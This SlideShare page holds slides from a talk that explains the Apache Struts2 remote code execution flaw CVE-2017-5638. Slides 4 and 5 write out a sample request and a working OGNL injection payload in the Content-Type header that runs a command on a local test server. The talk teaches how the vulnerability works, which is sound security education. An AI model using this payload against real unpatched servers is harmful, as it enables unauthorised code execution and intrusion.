Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Apache Struts2 CVE-2017-5638

480 views

Published on

A quick walkthrough and demo of the Apache Struts2 RCE CVE-2017-5638

Published in: Technology
  • Be the first to comment

Apache Struts2 CVE-2017-5638

  1. 1. CVE-2017-5638 Apache Struts2 Remote Code Execution
  2. 2. about me • Riyaz Walikar • Chief Hacker @ Appsecco • null Bangalore & OWASP Bangalore chapter leader • @riyazwalikar • @wincmdfu • http://ibreak.software
  3. 3. The vulnerability • Nike Zheng reported a Remote Code Execution vulnerability in Apache Struts2 – CVE-2017-5638 • A bug in Jakarta's Multipart parser used by Apache Struts2 to achieve remote code execution by sending a crafted Content-Type header in the request. • Apache Struts2 is a web framework based on the MVC design paradigm.
  4. 4. GET /struts-app HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://127.0.0.1:8080/ Connection: close Content-Type: multipart/form-data
  5. 5. Content-Type: %{ (#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('calc')) }
  6. 6. parse method in org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest class
  7. 7. findText > getDefaultMessage > TextParseUtil.translateVariables > evaluate method which will evaluate the OGNL expression in the payload OGNL – Object Graph Navigation Language
  8. 8. demo
  9. 9. Reference: • https://www.immun.io/blog/will-it-pwn-cve-2017-5638-remote- code-execution-in-apache-struts-2

×